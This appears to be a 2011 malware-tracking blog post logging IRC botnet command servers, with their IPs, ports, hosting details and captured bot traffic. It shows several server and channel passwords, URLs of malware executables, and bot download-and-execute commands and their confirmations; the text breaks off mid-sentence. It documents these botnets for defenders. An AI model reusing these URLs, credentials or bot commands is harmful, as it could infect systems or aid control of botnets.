Month: May 2011

ng.grasshopperz11.com (ngr bot hosted in China Beijing Chinanet Jiangxi Province Network)

DNS: ng.marketallone.com api.wipmania.com ng.themarketbaby.com ng.grasshopperz11.com

Resolved : [ng.grasshopperz11.com] To [123.183.217.32]
Resolved : [ng.grasshopperz11.com] To [60.190.218.104]
Resolved : [ng.grasshopperz11.com] To [59.63.157.62]
Resolved : [ng.grasshopperz11.com] To [59.53.91.167]
Resolved : [ng.grasshopperz11.com] To [60.190.223.125]
Resolved : [ng.marketallone.com] To [60.190.223.125]
Resolved : [ng.marketallone.com] To [59.63.157.62]
Resolved : [ng.marketallone.com] To [60.190.218.104]
Resolved : [ng.marketallone.com] To [123.183.217.32]
Resolved : [ng.marketallone.com] To [59.53.91.167]

65.75.118.255 (irc botnet hosted in Bahamas Nassau Cable Bahamas Ltd)

Remote Host Port Number
65.75.118.255 6667

USER soPSBDC47KHWcwuYTIVTwULhg8Msu7QbPef8Dja8Xt3rMvPBAkRtBrcrOj7gHNQ * * :gojMH85IxP3Molq
JOIN #lobby
USER bkqLycUpRpeCLWzJjgM * * :CG9IjLmh1q6GovTy7ZXg
NICK UYeyOjxZgUqXQ
PONG :5D8B0395
NICK kkvnH9rusO
PONG :8020ECE6
USER l1iI4EoH4633GZO9DFuPsDD * * :QAKmwLIbxRK
NICK k8rRRCahEHgwb5hP
PONG :171C849A

Hosting info: http://whois.domaintools.com/65.75.118.255

204.15.252.199 (irc botnet hosted in United States Henderson Trashy Media)

Remote Host Port Number
195.122.131.6 80
208.75.230.43 80
213.251.170.52 80
204.15.252.199 49287 (ircd here)

* The data identified by the following URLs was then requested from the remote web server:
  o http://rapidshare.com/files/936250907/lol.txt
  o http://www.freewebtown.com/nazmi/biz.exe
  o http://api.wipmania.com/

Hosting info: http://whois.domaintools.com/204.15.252.199

61.31.99.67 (irc botnet hosted in Taiwan Taipei Taiwan Fixed Network Co. Ltd)

Remote Host Port Number
208.75.230.43 80
61.31.99.67 4042

NICK new[USA|XP|COMPUTERNAME]dyaamkn
USER hh "" "lol" :hh
JOIN #newbiz#
PONG 422
NICK new[USA|XP|COMPUTERNAME]arfjwyo
USER hh "" "lol" :hh
JOIN #newgen#
PONG 422

* The data identified by the following URL was then requested from the remote web server:
  o http://www.freewebtown.com/nazmi/ass.exe

Hosting info: http://whois.domaintools.com/61.31.99.67

stolen.wshells.ws (irc botnet hosted in United States Morgantown Sharktech Internet Services)

Remote Host Port Number
stolen.wshells.ws 3211

PASS google_cache2.tmp
NICK [DvLz-USA|XP]062652
USER 0626 "" "TsGh" :0626
JOIN #DvLz DvLz#
NICK n[DvLz-USA|XP]737534
USER 4207 "" "TsGh" :4207
NICK [DvLz-USA|XP]976295
USER 9762 "" "TsGh" :9762

* The data identified by the following URL was then requested from the remote web server:
  o http://perfectteam.org/nosferatus/Crypter/taskhostt.exe

Hosting info: http://whois.domaintools.com/208.98.26.140

72.20.30.22 (irc botnet hosted in United States Staminus Communications)

Remote Host Port Number
216.45.58.150 80
72.20.30.22 5900

PASS Virus
NICK VirUs-sgpzxuis
USER VirUs "" "usk" : 2DIE 3FUCKER.
JOIN #B5# Virus
PONG :TESTING.STUFF.HERE

UPDATE:
NICK VirUs-fxpjhnff
USER VirUs "" "byy" : 8Coded 8Ahmed.Ramzey@Hotmail.Com..
JOIN #Rana1# Virus
PONG :TESTING.STUFF.HERE

Hosting info: http://whois.domaintools.com/72.20.30.22

irc.chimon.us (botnet hosted in Netherlands Amsterdam Denkers Ict – Ipv4 Infrastructure)

Resolved : [irc.chimon.us] To [46.21.169.42]
Resolved : [irc.chimon.us] To [67.202.109.136]

46.21.169.42:6567
Nick: [SI|AUT|00|P|40016]
Username: XP-6988
Server Pass: s1m0n3t4
Joined Channel: #sev# with Password c1rc0dusoleil
Channel Topic for Channel #sev#: ".desfi http://img103.herosh.com/2011/05/17/385482491.gif c:\WINDOWS\windi.exe 1"
Private Message to Channel #sev#: "[Dl]: Created process: "c:\WINDOWS\windi.exe", PID: "
Private Message to Channel #sev#: "[Dl]: File download: 80.0KB to: c:\WINDOWS\windi.exe

ngme.drwhox.com (irc botnet hosted in China Hebei Chinanet Hebei Province Network)

Remote Host Port Number
ngme.drwhox.com:5101
possible dns : ngme.yourwebfind.com
123.183.217.32 5101 PASS hax0r (ircd here)
213.251.170.52 80
31.184.237.43 80
60.190.223.125 6943 PASS laorosr (ircd here)

PRIVMSG #on :[d="http://31.184.237.43/0481.exe" s="60779 bytes"] Executed file "C:\Documents and Settings\UserName\Application Data\1.tmp" - Download retries: 0
MODE [N00_USA_XP_1567294] @ -ix

* The data identified by the following URLs was then requested from the